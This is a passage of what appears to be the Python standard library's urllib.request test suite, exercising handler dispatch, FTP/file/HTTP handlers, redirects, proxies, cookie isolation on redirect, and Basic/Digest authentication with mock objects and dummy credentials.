            return MockResponse(200, "OK", msg, "", req.get_full_url())
        # First request: replay the configured status and headers.
        self._count += 1
        name = http.client.responses[self.code]
        msg = email.message_from_string(self.headers)
        return self.parent.error(
            "http", req, MockFile(), self.code, name, msg)

class MockHTTPSHandler(urllib.request.AbstractHTTPHandler):
    """AbstractHTTPHandler whose connections go through a MockHTTPClass.

    Useful for verifying properties of the connection object after a
    request — e.g. the Proxy-Authorization header handling.
    """

    def __init__(self):
        super().__init__()
        # The recording connection shared by every https_open() call.
        self.httpconn = MockHTTPClass()

    def https_open(self, req):
        # Drive the request through the shared do_open() machinery.
        return self.do_open(self.httpconn, req)

class MockPasswordManager:
    """Password-manager stub: stores one credential, records lookups."""

    def add_password(self, realm, uri, user, password):
        self.realm = realm
        self.url = uri
        self.user = user
        self.password = password

    def find_user_password(self, realm, authuri):
        # Remember what was asked for so tests can verify it later.
        self.target_realm = realm
        self.target_url = authuri
        return self.user, self.password


class OpenerDirectorTests(unittest.TestCase):
    """Tests for OpenerDirector's handler registration and dispatch."""

    def test_add_non_handler(self):
        """add_handler() must reject objects defining no handler methods."""
        class NonHandler(object):
            pass
        self.assertRaises(TypeError,
                          OpenerDirector().add_handler, NonHandler())

    def test_badly_named_methods(self):
        # test work-around for three methods that accidentally follow the
        # naming conventions for handler methods
        # (*_open() / *_request() / *_response())

        # These used to call the accidentally-named methods, causing a
        # TypeError in real code; here, returning self from these mock
        # methods would either cause no exception, or AttributeError.

        from urllib.error import URLError

        o = OpenerDirector()
        meth_spec = [
            [("do_open", "return self"), ("proxy_open", "return self")],
            [("redirect_request", "return self")],
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)
        o.add_handler(urllib.request.UnknownHandler())
        for scheme in "do", "proxy", "redirect":
            self.assertRaises(URLError, o.open, scheme+"://example.com/")

    def test_handled(self):
        # handler returning non-None means no more handlers will be called
        o = OpenerDirector()
        meth_spec = [
            ["http_open", "ftp_open", "http_error_302"],
            ["ftp_open"],
            [("http_open", "return self")],
            [("http_open", "return self")],
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("http://example.com/")
        r = o.open(req)
        # Second .http_open() gets called, third doesn't, since second returned
        # non-None.  Handlers without .http_open() never get any methods called
        # on them.
        # In fact, second mock handler defining .http_open() returns self
        # (instead of response), which becomes the OpenerDirector's return
        # value.
        self.assertEqual(r, handlers[2])
        calls = [(handlers[0], "http_open"), (handlers[2], "http_open")]
        for expected, got in zip(calls, o.calls):
            handler, name, args, kwds = got
            self.assertEqual((handler, name), expected)
            self.assertEqual(args, (req,))

    def test_handler_order(self):
        """Handlers must be tried in ascending handler_order."""
        o = OpenerDirector()
        handlers = []
        for meths, handler_order in [
            ([("http_open", "return self")], 500),
            (["http_open"], 0),
            ]:
            class MockHandlerSubclass(MockHandler): pass
            h = MockHandlerSubclass(meths)
            h.handler_order = handler_order
            handlers.append(h)
            o.add_handler(h)

        r = o.open("http://example.com/")
        # handlers called in reverse order, thanks to their sort order
        self.assertEqual(o.calls[0][0], handlers[1])
        self.assertEqual(o.calls[1][0], handlers[0])

    def test_raise(self):
        # raising URLError stops processing of request
        o = OpenerDirector()
        meth_spec = [
            [("http_open", "raise")],
            [("http_open", "return self")],
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("http://example.com/")
        self.assertRaises(urllib.error.URLError, o.open, req)
        self.assertEqual(o.calls, [(handlers[0], "http_open", (req,), {})])

##     def test_error(self):
##         # XXX this doesn't actually seem to be used in standard library,
##         #  but should really be tested anyway...

    def test_http_error(self):
        # XXX http_error_default
        # http errors are a special case
        o = OpenerDirector()
        meth_spec = [
            [("http_open", "error 302")],
            [("http_error_400", "raise"), "http_open"],
            [("http_error_302", "return response"), "http_error_303",
             "http_error"],
            [("http_error_302")],
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        class Unknown:
            def __eq__(self, other): return True

        req = Request("http://example.com/")
        r = o.open(req)
        # Fix: was a bare "assert", which is stripped under python -O and
        # gives no diagnostics on failure; use a real unittest assertion.
        self.assertEqual(len(o.calls), 2)
        calls = [(handlers[0], "http_open", (req,)),
                 (handlers[2], "http_error_302",
                  (req, Unknown(), 302, "", {}))]
        for expected, got in zip(calls, o.calls):
            handler, method_name, args = expected
            self.assertEqual((handler, method_name), got[:2])
            self.assertEqual(args, got[2])

    def test_processors(self):
        # *_request / *_response methods get called appropriately
        o = OpenerDirector()
        meth_spec = [
            [("http_request", "return request"),
             ("http_response", "return response")],
            [("http_request", "return request"),
             ("http_response", "return response")],
            ]
        handlers = add_ordered_mock_handlers(o, meth_spec)

        req = Request("http://example.com/")
        r = o.open(req)
        # processor methods are called on *all* handlers that define them,
        # not just the first handler that handles the request
        calls = [
            (handlers[0], "http_request"), (handlers[1], "http_request"),
            (handlers[0], "http_response"), (handlers[1], "http_response")]

        for i, (handler, name, args, kwds) in enumerate(o.calls):
            if i < 2:
                # *_request
                self.assertEqual((handler, name), calls[i])
                self.assertEqual(len(args), 1)
                self.assertTrue(isinstance(args[0], Request))
            else:
                # *_response
                self.assertEqual((handler, name), calls[i])
                self.assertEqual(len(args), 2)
                self.assertTrue(isinstance(args[0], Request))
                # response from opener.open is None, because there's no
                # handler that defines http_open to handle it
                self.assertTrue(args[1] is None or
                             isinstance(args[1], MockResponse))


def sanepathname2url(path):
    """Return *path* converted to a URL path.

    On Windows, pathname2url can produce a leading "///"; drop the two
    extra slashes so the result looks like a normal URL path.
    """
    result = urllib.request.pathname2url(path)
    if os.name == "nt" and result.startswith("///"):
        result = result[2:]
    # XXX don't ask me about the mac...
    return result

class HandlerTests(unittest.TestCase):

    def test_ftp(self):
        """FTPHandler must parse user, password, host, port, dirs, file
        and transfer type out of the URL, and report sensible headers."""
        class MockFTPWrapper:
            # Stands in for the real ftpwrapper: records the retrieved
            # filename/filetype and returns the canned data.
            def __init__(self, data): self.data = data
            def retrfile(self, filename, filetype):
                self.filename, self.filetype = filename, filetype
                return io.StringIO(self.data), len(self.data)

        class NullFTPHandler(urllib.request.FTPHandler):
            # FTPHandler that records connection parameters instead of
            # actually dialling out.
            def __init__(self, data): self.data = data
            def connect_ftp(self, user, passwd, host, port, dirs,
                            timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
                self.user, self.passwd = user, passwd
                self.host, self.port = host, port
                self.dirs = dirs
                self.ftpwrapper = MockFTPWrapper(self.data)
                return self.ftpwrapper

        import ftplib
        data = "rheum rhaponicum"
        h = NullFTPHandler(data)
        o = h.parent = MockOpener()

        # Each case: url and the expected host/port/user/passwd/type/
        # dirs/filename/mimetype that ftp_open should derive from it.
        for url, host, port, user, passwd, type_, dirs, filename, mimetype in [
            ("ftp://localhost/foo/bar/baz.html",
             "localhost", ftplib.FTP_PORT, "", "", "I",
             ["foo", "bar"], "baz.html", "text/html"),
            ("ftp://parrot@localhost/foo/bar/baz.html",
             "localhost", ftplib.FTP_PORT, "parrot", "", "I",
             ["foo", "bar"], "baz.html", "text/html"),
            ("ftp://%25parrot@localhost/foo/bar/baz.html",
             "localhost", ftplib.FTP_PORT, "%parrot", "", "I",
             ["foo", "bar"], "baz.html", "text/html"),
            ("ftp://%2542parrot@localhost/foo/bar/baz.html",
             "localhost", ftplib.FTP_PORT, "%42parrot", "", "I",
             ["foo", "bar"], "baz.html", "text/html"),
            ("ftp://localhost:80/foo/bar/",
             "localhost", 80, "", "", "D",
             ["foo", "bar"], "", None),
            ("ftp://localhost/baz.gif;type=a",
             "localhost", ftplib.FTP_PORT, "", "", "A",
             [], "baz.gif", None),  # XXX really this should guess image/gif
            ]:
            req = Request(url)
            req.timeout = None
            r = h.ftp_open(req)
            # ftp authentication not yet implemented by FTPHandler
            self.assertEqual(h.user, user)
            self.assertEqual(h.passwd, passwd)
            self.assertEqual(h.host, socket.gethostbyname(host))
            self.assertEqual(h.port, port)
            self.assertEqual(h.dirs, dirs)
            self.assertEqual(h.ftpwrapper.filename, filename)
            self.assertEqual(h.ftpwrapper.filetype, type_)
            headers = r.info()
            self.assertEqual(headers.get("Content-type"), mimetype)
            self.assertEqual(int(headers["Content-length"]), len(data))

    def test_file(self):
        import email.utils, socket
        h = urllib.request.FileHandler()
        o = h.parent = MockOpener()

        TESTFN = support.TESTFN
        urlpath = sanepathname2url(os.path.abspath(TESTFN))
        towrite = b"hello, world\n"
        urls = [
            "file://localhost%s" % urlpath,
            "file://%s" % urlpath,
            "file://%s%s" % (socket.gethostbyname('localhost'), urlpath),
            ]
        try:
            localaddr = socket.gethostbyname(socket.gethostname())
        except socket.gaierror:
            localaddr = ''
        if localaddr:
            urls.append("file://%s%s" % (localaddr, urlpath))

        for url in urls:
            f = open(TESTFN, "wb")
            try:
                try:
                    f.write(towrite)
                finally:
                    f.close()

                r = h.file_open(Request(url))
                try:
                    data = r.read()
                    headers = r.info()
                    respurl = r.geturl()
                finally:
                    r.close()
                stats = os.stat(TESTFN)
                modified = email.utils.formatdate(stats.st_mtime, usegmt=True)
            finally:
                os.remove(TESTFN)
            self.assertEqual(data, towrite)
            self.assertEqual(headers["Content-type"], "text/plain")
            self.assertEqual(headers["Content-length"], "13")
            self.assertEqual(headers["Last-modified"], modified)
            self.assertEqual(respurl, url)

        for url in [
            "file://localhost:80%s" % urlpath,
            "file:///file_does_not_exist.txt",
            "file://%s:80%s/%s" % (socket.gethostbyname('localhost'),
                                   os.getcwd(), TESTFN),
            "file://somerandomhost.ontheinternet.com%s/%s" %
            (os.getcwd(), TESTFN),
            ]:
            try:
                f = open(TESTFN, "wb")
                try:
                    f.write(towrite)
                finally:
                    f.close()

                self.assertRaises(urllib.error.URLError,
                                  h.file_open, Request(url))
            finally:
                os.remove(TESTFN)

        h = urllib.request.FileHandler()
        o = h.parent = MockOpener()
        # XXXX why does // mean ftp (and /// mean not ftp!), and where
        #  is file: scheme specified?  I think this is really a bug, and
        #  what was intended was to distinguish between URLs like:
        # file:/blah.txt (a file)
        # file://localhost/blah.txt (a file)
        # file:///blah.txt (a file)
        # file://ftp.example.com/blah.txt (an ftp URL)
        for url, ftp in [
            ("file://ftp.example.com//foo.txt", True),
            ("file://ftp.example.com///foo.txt", False),
# XXXX bug: fails with OSError, should be URLError
            ("file://ftp.example.com/foo.txt", False),
            ("file://somehost//foo/something.txt", True),
            ("file://localhost//foo/something.txt", False),
            ]:
            req = Request(url)
            try:
                h.file_open(req)
            # XXXX remove OSError when bug fixed
            except (urllib.error.URLError, OSError):
                self.assertFalse(ftp)
            else:
                self.assertIs(o.req, req)
                self.assertEqual(req.type, "ftp")
            self.assertEqual(req.type is "ftp", ftp)

    def test_http(self):
        """AbstractHTTPHandler.do_open()/do_request_() must build the
        request correctly and wrap the connection's response."""

        h = urllib.request.AbstractHTTPHandler()
        o = h.parent = MockOpener()

        url = "http://example.com/"
        for method, data in [("GET", None), ("POST", "blah")]:
            req = Request(url, data, {"Foo": "bar"})
            req.timeout = None
            req.add_unredirected_header("Spam", "eggs")
            http = MockHTTPClass()
            r = h.do_open(http, req)

            # result attributes
            r.read; r.readline  # wrapped MockFile methods
            r.info; r.geturl  # addinfourl methods
            # Fix: was "r.code, r.msg == 200, 'OK'" — a no-op tuple
            # expression that asserted nothing; do_open() sets .code and
            # replaces .msg with the connection's reason.
            self.assertEqual(r.code, 200)
            self.assertEqual(r.msg, "OK")
            hdrs = r.info()
            hdrs.get; hdrs.__contains__  # r.info() gives dict from .getreply()
            self.assertEqual(r.geturl(), url)

            self.assertEqual(http.host, "example.com")
            self.assertEqual(http.level, 0)
            self.assertEqual(http.method, method)
            self.assertEqual(http.selector, "/")
            self.assertEqual(http.req_headers,
                             [("Connection", "close"),
                              ("Foo", "bar"), ("Spam", "eggs")])
            self.assertEqual(http.data, data)

        # check socket.error converted to URLError
        http.raise_on_endheaders = True
        self.assertRaises(urllib.error.URLError, h.do_open, http, req)

        # check adding of standard headers
        o.addheaders = [("Spam", "eggs")]
        for data in "", None:  # POST, GET
            req = Request("http://example.com/", data)
            r = MockResponse(200, "OK", {}, "")
            newreq = h.do_request_(req)
            if data is None:  # GET
                self.assertTrue("Content-length" not in req.unredirected_hdrs)
                self.assertTrue("Content-type" not in req.unredirected_hdrs)
            else:  # POST
                self.assertEqual(req.unredirected_hdrs["Content-length"], "0")
                self.assertEqual(req.unredirected_hdrs["Content-type"],
                             "application/x-www-form-urlencoded")
            # XXX the details of Host could be better tested
            self.assertEqual(req.unredirected_hdrs["Host"], "example.com")
            self.assertEqual(req.unredirected_hdrs["Spam"], "eggs")

            # don't clobber existing headers
            req.add_unredirected_header("Content-length", "foo")
            req.add_unredirected_header("Content-type", "bar")
            req.add_unredirected_header("Host", "baz")
            req.add_unredirected_header("Spam", "foo")
            newreq = h.do_request_(req)
            self.assertEqual(req.unredirected_hdrs["Content-length"], "foo")
            self.assertEqual(req.unredirected_hdrs["Content-type"], "bar")
            self.assertEqual(req.unredirected_hdrs["Host"], "baz")
            self.assertEqual(req.unredirected_hdrs["Spam"], "foo")

    def test_http_doubleslash(self):
        """Redundant double slashes in a URL must not break parsing.

        Previously, a double slash directly after the host could cause
        incorrect parsing.
        """
        h = urllib.request.AbstractHTTPHandler()
        o = h.parent = MockOpener()

        data = ""
        for url in [
            "http://example.com/foo/bar/baz.html",
            "http://example.com//foo/bar/baz.html",
            "http://example.com/foo//bar/baz.html",
            "http://example.com/foo/bar//baz.html",
            ]:
            req = Request(url, data)

            # Host must be determined correctly when there is no proxy...
            no_proxy_req = h.do_request_(req)
            self.assertEqual(no_proxy_req.unredirected_hdrs["Host"],
                             "example.com")

            # ...and also when there is one.
            req.set_proxy("someproxy:3128", None)
            proxied_req = h.do_request_(req)
            self.assertEqual(proxied_req.unredirected_hdrs["Host"],
                             "example.com")

    def test_fixpath_in_weirdurls(self):
        """Issue 4493: a '/' must be supplied for URLs whose path does
        not start with '/'."""
        h = urllib.request.AbstractHTTPHandler()
        o = h.parent = MockOpener()

        for url, expected_selector in [
            ('http://www.python.org?getspam', '/?getspam'),
            ('http://www.python.org', ''),
            ]:
            newreq = h.do_request_(Request(url))
            self.assertEqual(newreq.host, 'www.python.org')
            self.assertEqual(newreq.selector, expected_selector)


    def test_errors(self):
        """HTTPErrorProcessor passes 2xx responses through untouched and
        routes everything else to the opener's error() machinery."""
        h = urllib.request.HTTPErrorProcessor()
        o = h.parent = MockOpener()

        url = "http://example.com/"
        req = Request(url)
        # all 2xx responses are passed through unchanged
        for code, msg in [(200, "OK"),
                          (202, "Accepted"),
                          (206, "Partial content")]:
            r = MockResponse(code, msg, {}, "", url)
            self.assertIs(h.http_response(req, r), r)
            self.assertFalse(hasattr(o, "proto"))  # o.error not called
        # anything else calls o.error (and MockOpener returns None, here)
        r = MockResponse(502, "Bad gateway", {}, "", url)
        self.assertIsNone(h.http_response(req, r))
        self.assertEqual(o.proto, "http")  # o.error called
        self.assertEqual(o.args, (req, r, 502, "Bad gateway", {}))

    def test_cookies(self):
        """HTTPCookieProcessor must hand each request/response pair to
        its cookie jar."""
        jar = MockCookieJar()
        h = urllib.request.HTTPCookieProcessor(jar)
        o = h.parent = MockOpener()

        req = Request("http://example.com/")
        r = MockResponse(200, "OK", {}, "")
        newreq = h.http_request(req)
        self.assertIs(jar.ach_req, req)
        self.assertIs(jar.ach_req, newreq)
        self.assertEqual(req.get_origin_req_host(), "example.com")
        self.assertFalse(req.is_unverifiable())
        newr = h.http_response(req, r)
        self.assertIs(jar.ec_req, req)
        self.assertIs(jar.ec_r, r)
        self.assertIs(r, newr)

    def test_redirect(self):
        """HTTPRedirectHandler: ordinary redirects, loop detection, and
        the max_repeats / max_redirections limits."""
        from_url = "http://example.com/a.html"
        to_url = "http://example.com/b.html"
        h = urllib.request.HTTPRedirectHandler()
        o = h.parent = MockOpener()

        # ordinary redirect behaviour
        for code in 301, 302, 303, 307:
            for data in None, "blah\nblah\n":
                method = getattr(h, "http_error_%s" % code)
                req = Request(from_url, data)
                req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
                req.add_header("Nonsense", "viking=withhold")
                if data is not None:
                    req.add_header("Content-Length", str(len(data)))
                req.add_unredirected_header("Spam", "spam")
                try:
                    method(req, MockFile(), code, "Blah",
                           MockHeaders({"location": to_url}))
                except urllib.error.HTTPError:
                    # 307 in response to POST requires user OK
                    self.assertTrue(code == 307 and data is not None)
                self.assertEqual(o.req.get_full_url(), to_url)
                try:
                    self.assertEqual(o.req.get_method(), "GET")
                except AttributeError:
                    self.assertFalse(o.req.has_data())

                # now it's a GET, there should not be headers regarding content
                # (possibly dragged from before being a POST)
                headers = [x.lower() for x in o.req.headers]
                self.assertTrue("content-length" not in headers)
                self.assertTrue("content-type" not in headers)

                self.assertEqual(o.req.headers["Nonsense"],
                                 "viking=withhold")
                # unredirected headers must not survive a redirect
                self.assertTrue("Spam" not in o.req.headers)
                self.assertTrue("Spam" not in o.req.unredirected_hdrs)

        # loop detection
        req = Request(from_url)
        req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
        def redirect(h, req, url=to_url):
            # Simulate one 302 hop of req to url through the handler.
            h.http_error_302(req, MockFile(), 302, "Blah",
                             MockHeaders({"location": url}))
        # Note that the *original* request shares the same record of
        # redirections with the sub-requests caused by the redirections.

        # detect infinite loop redirect of a URL to itself
        req = Request(from_url, origin_req_host="example.com")
        count = 0
        req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
        try:
            while 1:
                redirect(h, req, "http://example.com/")
                count = count + 1
        except urllib.error.HTTPError:
            # don't stop until max_repeats, because cookies may introduce state
            self.assertEqual(count, urllib.request.HTTPRedirectHandler.max_repeats)

        # detect endless non-repeating chain of redirects
        req = Request(from_url, origin_req_host="example.com")
        count = 0
        req.timeout = socket._GLOBAL_DEFAULT_TIMEOUT
        try:
            while 1:
                redirect(h, req, "http://example.com/%d" % count)
                count = count + 1
        except urllib.error.HTTPError:
            self.assertEqual(count,
                             urllib.request.HTTPRedirectHandler.max_redirections)

    def test_cookie_redirect(self):
        """Cookies must not leak into redirected requests."""
        from http.cookiejar import CookieJar
        from test.test_http_cookiejar import interact_netscape

        jar = CookieJar()
        interact_netscape(jar, "http://www.example.com/", "spam=eggs")
        http_handler = MockHTTPHandler(
            302, "Location: http://www.cracker.com/\r\n\r\n")
        opener = build_test_opener(
            http_handler,
            urllib.request.HTTPDefaultErrorHandler(),
            urllib.request.HTTPRedirectHandler(),
            urllib.request.HTTPCookieProcessor(jar))
        opener.open("http://www.example.com/")
        # The cookie set for example.com must not follow the redirect
        # to cracker.com.
        self.assertFalse(http_handler.req.has_header("Cookie"))

    def test_proxy(self):
        """ProxyHandler must rewrite the request host to the proxy."""
        o = OpenerDirector()
        o.add_handler(urllib.request.ProxyHandler(
            dict(http="proxy.example.com:3128")))
        handlers = add_ordered_mock_handlers(
            o, [[("http_open", "return response")]])

        req = Request("http://acme.example.com/")
        self.assertEqual(req.get_host(), "acme.example.com")
        o.open(req)
        self.assertEqual(req.get_host(), "proxy.example.com:3128")

        self.assertEqual([(handlers[0], "http_open")],
                         [call[0:2] for call in o.calls])

    def test_proxy_no_proxy(self):
        """Hosts matching $no_proxy must bypass the proxy."""
        os.environ['no_proxy'] = 'python.org'
        try:
            o = OpenerDirector()
            ph = urllib.request.ProxyHandler(dict(http="proxy.example.com"))
            o.add_handler(ph)
            # www.perl.org is not covered by no_proxy: request is proxied.
            req = Request("http://www.perl.org/")
            self.assertEqual(req.get_host(), "www.perl.org")
            r = o.open(req)
            self.assertEqual(req.get_host(), "proxy.example.com")
            # www.python.org matches no_proxy: host is left untouched.
            req = Request("http://www.python.org")
            self.assertEqual(req.get_host(), "www.python.org")
            r = o.open(req)
            self.assertEqual(req.get_host(), "www.python.org")
        finally:
            # Fix: previously the variable was only removed on success,
            # leaking 'no_proxy' into later tests if an assertion failed.
            del os.environ['no_proxy']


    def test_proxy_https(self):
        """ProxyHandler must rewrite https request hosts to the proxy."""
        o = OpenerDirector()
        o.add_handler(urllib.request.ProxyHandler(
            dict(https="proxy.example.com:3128")))
        handlers = add_ordered_mock_handlers(
            o, [[("https_open", "return response")]])

        req = Request("https://www.example.com/")
        self.assertEqual(req.get_host(), "www.example.com")
        o.open(req)
        self.assertEqual(req.get_host(), "proxy.example.com:3128")
        self.assertEqual([(handlers[0], "https_open")],
                         [call[0:2] for call in o.calls])

    def test_proxy_https_proxy_authorization(self):
        """Proxy-Authorization must travel on the CONNECT tunnel, not on
        the tunneled request's connection headers."""
        o = OpenerDirector()
        o.add_handler(urllib.request.ProxyHandler(
            dict(https='proxy.example.com:3128')))
        https_handler = MockHTTPSHandler()
        o.add_handler(https_handler)

        req = Request("https://www.example.com/")
        req.add_header("Proxy-Authorization", "FooBar")
        req.add_header("User-Agent", "Grail")
        self.assertEqual(req.get_host(), "www.example.com")
        self.assertIsNone(req._tunnel_host)
        o.open(req)
        # The connection's req_headers must not contain the
        # Proxy-Authorization header, but the request itself will.
        self.assertNotIn(("Proxy-Authorization", "FooBar"),
                         https_handler.httpconn.req_headers)
        self.assertIn(("User-Agent", "Grail"),
                      https_handler.httpconn.req_headers)
        self.assertIsNotNone(req._tunnel_host)
        self.assertEqual(req.get_host(), "proxy.example.com:3128")
        self.assertEqual(req.get_header("Proxy-authorization"), "FooBar")

    def test_basic_auth(self, quote_char='"'):
        """Exercise HTTPBasicAuthHandler against a 401 challenge whose
        realm is wrapped in *quote_char*."""
        opener = OpenerDirector()
        password_manager = MockPasswordManager()
        auth_handler = urllib.request.HTTPBasicAuthHandler(password_manager)
        realm = "ACME Widget Store"
        challenge = 'WWW-Authenticate: Basic realm=%s%s%s\r\n\r\n' % (
            quote_char, realm, quote_char)
        http_handler = MockHTTPHandler(401, challenge)
        opener.add_handler(auth_handler)
        opener.add_handler(http_handler)
        self._test_basic_auth(opener, auth_handler, "Authorization",
                              realm, http_handler, password_manager,
                              "http://acme.example.com/protected",
                              "http://acme.example.com/protected",
                              )

    def test_basic_auth_with_single_quoted_realm(self):
        # Same flow as test_basic_auth, but the realm in the
        # WWW-Authenticate challenge is single-quoted.
        self.test_basic_auth(quote_char="'")

    def test_proxy_basic_auth(self):
        """ProxyBasicAuthHandler should answer a 407 proxy challenge."""
        realm = "ACME Networks"
        opener = OpenerDirector()
        opener.add_handler(
            urllib.request.ProxyHandler(dict(http="proxy.example.com:3128")))
        password_manager = MockPasswordManager()
        auth_handler = urllib.request.ProxyBasicAuthHandler(password_manager)
        http_handler = MockHTTPHandler(
            407, 'Proxy-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
        opener.add_handler(auth_handler)
        opener.add_handler(http_handler)
        self._test_basic_auth(opener, auth_handler, "Proxy-authorization",
                              realm, http_handler, password_manager,
                              "http://acme.example.com:3128/protected",
                              "proxy.example.com:3128",
                              )

    def test_basic_and_digest_auth_handlers(self):
        """Digest auth must be tried before Basic, and a digest handler that
        cannot handle a 401 must fail quietly so Basic can take over."""
        # HTTPDigestAuthHandler threw an exception if it couldn't handle a 40*
        # response (http://python.org/sf/1479302), where it should instead
        # return None to allow another handler (especially
        # HTTPBasicAuthHandler) to handle the response.

        # Also (http://python.org/sf/14797027, RFC 2617 section 1.2), we must
        # try digest first (since it's the strongest auth scheme), so we record
        # order of calls here to check digest comes first:
        class RecordingOpenerDirector(OpenerDirector):
            # Collects the order in which the auth handlers fire.
            def __init__(self):
                OpenerDirector.__init__(self)
                self.recorded = []
            def record(self, info):
                self.recorded.append(info)
        class TestDigestAuthHandler(urllib.request.HTTPDigestAuthHandler):
            # Records "digest" before delegating to the real handler.
            def http_error_401(self, *args, **kwds):
                self.parent.record("digest")
                urllib.request.HTTPDigestAuthHandler.http_error_401(self,
                                                             *args, **kwds)
        class TestBasicAuthHandler(urllib.request.HTTPBasicAuthHandler):
            # Records "basic" before delegating to the real handler.
            def http_error_401(self, *args, **kwds):
                self.parent.record("basic")
                urllib.request.HTTPBasicAuthHandler.http_error_401(self,
                                                            *args, **kwds)

        opener = RecordingOpenerDirector()
        password_manager = MockPasswordManager()
        digest_handler = TestDigestAuthHandler(password_manager)
        basic_handler = TestBasicAuthHandler(password_manager)
        realm = "ACME Networks"
        # The server only offers a Basic challenge, so digest must give up.
        http_handler = MockHTTPHandler(
            401, 'WWW-Authenticate: Basic realm="%s"\r\n\r\n' % realm)
        opener.add_handler(basic_handler)
        opener.add_handler(digest_handler)
        opener.add_handler(http_handler)

        # check basic auth isn't blocked by digest handler failing
        self._test_basic_auth(opener, basic_handler, "Authorization",
                              realm, http_handler, password_manager,
                              "http://acme.example.com/protected",
                              "http://acme.example.com/protected",
                              )
        # check digest was tried before basic (twice, because
        # _test_basic_auth called .open() twice)
        self.assertEqual(opener.recorded, ["digest", "basic"]*2)

    def _test_basic_auth(self, opener, auth_handler, auth_header,
                         realm, http_handler, password_manager,
                         request_url, protected_url):
        """Drive one Basic-auth round trip and verify handler behaviour.

        Checks that add_password() reaches the password manager, that the
        opener retries with the *auth_header* set after a challenge, and
        that no retry happens once the password manager has no credentials.
        """
        import base64
        user, password = "wile", "coyote"

        # .add_password() fed through to password manager
        auth_handler.add_password(realm, request_url, user, password)
        self.assertEqual(realm, password_manager.realm)
        self.assertEqual(request_url, password_manager.url)
        self.assertEqual(user, password_manager.user)
        self.assertEqual(password, password_manager.password)

        r = opener.open(request_url)

        # should have asked the password manager for the username/password
        self.assertEqual(password_manager.target_realm, realm)
        self.assertEqual(password_manager.target_url, protected_url)

        # expect one request without authorization, then one with
        self.assertEqual(len(http_handler.requests), 2)
        self.assertFalse(http_handler.requests[0].has_header(auth_header))
        userpass = bytes('%s:%s' % (user, password), "ascii")
        # Credentials are base64-encoded per RFC 2617 Basic auth.
        auth_hdr_value = ('Basic ' +
            base64.encodebytes(userpass).strip().decode())
        self.assertEqual(http_handler.requests[1].get_header(auth_header),
                         auth_hdr_value)
        self.assertEqual(http_handler.requests[1].unredirected_hdrs[auth_header],
                         auth_hdr_value)
        # if the password manager can't find a password, the handler won't
        # handle the HTTP auth error
        password_manager.user = password_manager.password = None
        http_handler.reset()
        r = opener.open(request_url)
        self.assertEqual(len(http_handler.requests), 1)
        self.assertFalse(http_handler.requests[0].has_header(auth_header))

class MiscTests(unittest.TestCase):
    """Tests for urllib.request.build_opener handler selection."""

    def test_build_opener(self):
        """build_opener() accepts classes and instances, lets subclasses
        replace default handlers, and keeps same-base-class handlers."""
        class MyHTTPHandler(urllib.request.HTTPHandler): pass
        class FooHandler(urllib.request.BaseHandler):
            def foo_open(self): pass
        class BarHandler(urllib.request.BaseHandler):
            def bar_open(self): pass

        build_opener = urllib.request.build_opener

        opener = build_opener(FooHandler, BarHandler)
        for handler_class in (FooHandler, BarHandler):
            self.opener_has_handler(opener, handler_class)

        # can take a mix of classes and instances
        opener = build_opener(FooHandler, BarHandler())
        for handler_class in (FooHandler, BarHandler):
            self.opener_has_handler(opener, handler_class)

        # subclasses of default handlers override default handlers
        opener = build_opener(MyHTTPHandler)
        self.opener_has_handler(opener, MyHTTPHandler)

        # a particular case of overriding: default handlers can be passed
        # in explicitly (as a class or as an instance)
        for args in ((), (urllib.request.HTTPHandler,),
                     (urllib.request.HTTPHandler(),)):
            opener = build_opener(*args)
            self.opener_has_handler(opener, urllib.request.HTTPHandler)

        # Issue2670: multiple handlers sharing the same base class
        class MyOtherHTTPHandler(urllib.request.HTTPHandler): pass
        opener = build_opener(MyHTTPHandler, MyOtherHTTPHandler)
        for handler_class in (MyHTTPHandler, MyOtherHTTPHandler):
            self.opener_has_handler(opener, handler_class)

    def opener_has_handler(self, opener, handler_class):
        """Assert that *opener* holds a handler of exactly *handler_class*."""
        self.assertTrue(any(type(h) is handler_class
                            for h in opener.handlers))

class RequestTests(unittest.TestCase):
    """Exercise the accessor methods of urllib.request.Request."""

    def setUp(self):
        # One GET-style request (no data) and one POST-style request.
        self.get = Request("http://www.python.org/~jeremy/")
        self.post = Request("http://www.python.org/~jeremy/",
                            "data",
                            headers={"X-Test": "test"})

    def test_method(self):
        # The HTTP method is derived from the presence of data.
        self.assertEqual("POST", self.post.get_method())
        self.assertEqual("GET", self.get.get_method())

    def test_add_data(self):
        self.assertFalse(self.get.has_data())
        self.assertEqual("GET", self.get.get_method())
        # Attaching data flips the method to POST.
        self.get.add_data("spam")
        self.assertTrue(self.get.has_data())
        self.assertEqual("POST", self.get.get_method())

    def test_get_full_url(self):
        self.assertEqual("http://www.python.org/~jeremy/",
                         self.get.get_full_url())

    def test_selector(self):
        self.assertEqual("/~jeremy/", self.get.get_selector())
        # A bare host yields the root selector.
        self.assertEqual("/", Request("http://www.python.org/").get_selector())

    def test_get_type(self):
        self.assertEqual("http", self.get.get_type())

    def test_get_host(self):
        self.assertEqual("www.python.org", self.get.get_host())

    def test_get_host_unquote(self):
        # %70 is the percent-encoding of 'p'; get_host should unquote it.
        self.assertEqual("www.python.org",
                         Request("http://www.%70ython.org/").get_host())

    def test_proxy(self):
        self.assertFalse(self.get.has_proxy())
        self.get.set_proxy("www.perl.org", "http")
        self.assertTrue(self.get.has_proxy())
        # The original host is preserved while the proxy becomes the host.
        self.assertEqual("www.python.org", self.get.get_origin_req_host())
        self.assertEqual("www.perl.org", self.get.get_host())

    def test_wrapped_url(self):
        # A URL wrapped in <URL:...> should still yield the right host.
        self.assertEqual("www.python.org",
                         Request("<URL:http://www.python.org>").get_host())

    def test_urlwith_fragment(self):
        # Fragments are stripped from the selector.
        self.assertEqual(
            "/?qs=query",
            Request("http://www.python.org/?qs=query#fragment=true").get_selector())
        self.assertEqual(
            "/",
            Request("http://www.python.org/#fun=true").get_selector())


def test_main(verbose=None):
    """Run the module's doctests and all of its unittest test cases."""
    from test import test_urllib2
    support.run_doctest(test_urllib2, verbose)
    support.run_doctest(urllib.request, verbose)
    support.run_unittest(TrivialTests,
